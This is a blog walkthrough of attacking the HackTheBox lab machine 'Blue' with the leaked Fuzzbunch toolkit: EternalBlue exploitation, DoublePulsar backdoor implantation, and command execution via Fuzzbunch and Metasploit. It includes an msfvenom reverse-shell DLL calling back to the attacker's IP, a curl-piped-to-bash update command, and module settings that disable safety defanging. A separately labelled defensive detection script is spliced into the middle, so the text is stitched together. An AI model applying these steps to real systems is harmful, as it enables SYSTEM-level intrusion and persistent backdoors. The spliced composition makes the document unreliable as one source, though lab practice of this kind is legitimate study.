This post is a thinly veiled excuse to get some Fuzzbunch content out there for people who’ve never used the tool, but wanted a thinly veiled excuse and a good target. I’m also posting this because William Vu recently wrote a few fantastic blog posts about the research behind his team’s new Metasploit module for DoublePulsar RCE on both SMB and RDP. Check out William’s Open-Source Command and Control of the DOUBLEPULSAR Implant for relevant reading and get some priceless insight into his approach.
If you’ve found this post but are fuzzy on the backstory Wikipedia has a great entry. TLDR: NSA cyber weapons, ransomware, everyone patched.
Disclaimer: Use Fuzzbunch at your own risk. Never run Fuzzbunch anywhere other than a lab environment, on VMs which you will revert/trash afterwards. Don’t do bad things to people who don’t patch, etc.
We’ll start by installing Wine + Fuzzbunch on an up-to-date Kali VM, then use it to attack HacktheBox’s retired box Blue using the EternalBlue plugin, implant DoublePulsar, then execute commands via Fuzzbunch and Metasploit’s DoublePulsar RCE module (exploit/windows/smb/smb_doublepulsar_rce). Yes you need a HacktheBox VIP membership to access Blue, yes it’s 100% worth it, and yes you can follow along on an unlicensed copy of Windows 7 x64 that isn’t patched for EternalBlue (MS17-010).
What is DoublePulsar?
DoublePulsar is a Windows backdoor developed by the US government which runs in kernel mode and gives attackers on the local network RCE as SYSTEM. You can test for it using Ping and remotely uninstall it to remove the IOC. It’s pretty awesome, and we’re going to infect a computer with it.
These installation steps are 100% taken from mdiazcl’s GitHub. See mdiazcl’s repo for a more thorough breakdown of the process, as I’m going to gloss over and combine steps into big blocks of commands for easy copy/paste into a terminal.
These commands set up Wine and Wine 32, configure the terminal, initialize the Wine environment, and open up a regedit.exe window.
apt update && apt install -qy wine winbind winetricks \
&& dpkg --add-architecture i386 && apt-get update \
&& apt-get install -qy wine32 \
&& WINEPREFIX="$HOME/.wine-fuzzbunch" WINEARCH=win32 wine wineboot \
&& export WINEPREFIX=$HOME/.wine-fuzzbunch \
&& wine regedit.exe
In regedit, go to HKEY_CURRENT_USER > Environment, right click > New > String Value. Enter PATH as the name, then double click on PATH and set Value data to:
Click OK, close regedit.exe.
Clone the Fuzzbunch repo, install Python 2.6, and launch the Wine environment. Click Next on any Python installer popups.
cd $HOME/.wine-fuzzbunch/drive_c \
&& git clone https://github.com/mdiazcl/fuzzbunch-debian.git \
&& winetricks python26 && cd $HOME/.wine-fuzzbunch/drive_c/fuzzbunch-debian/windows \
&& wine cmd.exe
Running EternalBlue and Implanting DoublePulsar
Launch Fuzzbunch in the Wine environment created in the previous step:
Most values can be left as default. Here’s what I used for Blue:
- Default Target IP Address: 10.10.10.40
- Default Callback IP Address: <YOUR IP GOES HERE>
- Use Redirection: no
- Base Log directory: <Default>
- Project: 0
- New Project Name: TestingDoublePulsar
- Set target log directory to: <Default>
Next load and configure the EternalBlue plugin with the
Leave all options as Default, except:
- Mode: 1
Hit Enter to execute; your log should look something like this:
Reading through the log, you can see some parts are familiar from Metasploit’s EternalBlue module. You can also see that DoublePulsar was confirmed to have worked via a Ping test.
Verifying the DoublePulsar Implant
Use and load the DoublePulsar plugin to double-check that the implant worked.
Leave all the values as default except:
- Architecture: 1
- Function: 1
Set the remaining options to Default, then hit Enter to execute the plugin.
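What the Ping test above (and Metasploit’s scanner) is actually checking on the wire is the Multiplex ID of the reply to a Trans2 SESSION_SETUP request: a clean SMB1 server echoes the request’s MID of 0x41, while an implanted host answers with 0x51. The following is an added, defender-side example that is not part of this post, Fuzzbunch, or Metasploit: it parses SMB1 response headers (for instance pulled from a packet capture) and flags hosts that show the implant’s MID. The sample replies and IP addresses are constructed for the example.

```python
import struct

# SMB1 header constants used by the DoublePulsar ping check.
SMB_MAGIC = b"\xffSMB"
SMB_COM_TRANSACTION2 = 0x32   # Trans2, the command the ping is sent as
MID_CLEAN = 0x41              # MID a clean server echoes back
MID_IMPLANTED = 0x51          # MID returned by an implanted host


def parse_smb1_header(packet: bytes) -> dict:
    """Parse a NetBIOS-framed SMB1 header (4 + 32 bytes) into its fields."""
    if len(packet) < 36:
        raise ValueError("packet too short for NetBIOS + SMB1 header")
    hdr = packet[4:36]                     # skip the 4-byte NetBIOS session header
    if hdr[:4] != SMB_MAGIC:
        raise ValueError("not an SMB1 header")
    (command, status, flags, flags2, pid_high, signature, _reserved,
     tid, pid, uid, mid) = struct.unpack("<BIBHH8sHHHHH", hdr[4:])
    return {"command": command, "status": status, "flags": flags,
            "flags2": flags2, "signature": signature, "tid": tid,
            "pid": pid, "uid": uid, "mid": mid}


def is_doublepulsar_response(packet: bytes) -> bool:
    """True if a Trans2 reply carries the implant's tell-tale Multiplex ID."""
    h = parse_smb1_header(packet)
    return h["command"] == SMB_COM_TRANSACTION2 and h["mid"] == MID_IMPLANTED


def build_trans2_response(mid: int, status: int = 0) -> bytes:
    """Constructed sample reply: NetBIOS header + minimal SMB1 Trans2 header.
    Field values other than the MID are placeholders, not real captures."""
    body = SMB_MAGIC + struct.pack(
        "<BIBHH8sHHHHH", SMB_COM_TRANSACTION2, status, 0x98, 0xC007, 0,
        b"\x00" * 8, 0, 0x0800, 0xFEFF, 0x0800, mid)
    return b"\x00" + len(body).to_bytes(3, "big") + body


# Constructed replies keyed by responding host (hypothetical addresses).
SAMPLE_REPLIES = {
    "10.10.10.40": build_trans2_response(MID_IMPLANTED),
    "10.10.10.41": build_trans2_response(MID_CLEAN),
}


def implanted_hosts(replies: dict) -> list:
    """Return the hosts whose Trans2 reply matches the implant signature."""
    return sorted(ip for ip, pkt in replies.items()
                  if is_doublepulsar_response(pkt))


if __name__ == "__main__":
    print("implanted:", implanted_hosts(SAMPLE_REPLIES))   # ['10.10.10.40']
```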
Alternatively you can load msfconsole and use the DoublePulsar detection module:
First we’ll use Fuzzbunch’s DLL Injection module with DoublePulsar to get a reverse shell, then we’ll try it again with the cool new Metasploit module.
Use msfvenom to generate a DLL with a basic reverse shell and place it in the root of the Wine environment (
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<YOUR IP GOES HERE> LPORT=443 -f dll -o runme.dll \
&& mv runme.dll ~/.wine-fuzzbunch/drive_c
Back in Fuzzbunch, reload DoublePulsar.
Use the same default values as earlier, except set Function to 2 for DLL Injection, and specify the path to the payload:
- Function: 2
- DllPayload: C:\runme.dll
Leave the rest as Default, create a netcat listener to catch the reverse shell, and execute the plugin.
Metasploit’s DoublePulsar SMB RCE
Metasploit’s DoublePulsar RCE module is new, so if you’re on an old version of metasploit-framework, update with this one-liner.
curl -sL https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb | bash
After updating Metasploit, run msfconsole, then load the module:
Note: if after updating msf the DoublePulsar module is not found, exit msfconsole and reinitialize the database with
Now set options and execute. You must set DefangedMode to False to execute the payload.
set LHOST tun0
set LPORT 443
set RHOSTS 10.10.10.40
set DefangedMode False
Disabling the Implant
The makers of DoublePulsar also included the ability to remove the implant remotely, so let’s use it to clean up. From msfconsole, load the DoublePulsar SMB RCE module if it’s not already loaded.
Set the options, and don’t forget DefangedMode:
set RHOSTS 10.10.10.40
set target 1
set DefangedMode False
Now run it.
Reload Metasploit’s DoublePulsar scanner from earlier and scan Blue. No more backdoor.
That’s how the pros do it. RCE to SYSTEM with a backdoor and fancy interface that anyone could use. Hopefully next time the NSA is more careful about who gets to play with their toys. Until then we’ll have our own toys like Metasploit, and devs like William Vu and his coworkers at Rapid7 adding useful modules to keep Blue Teams busy.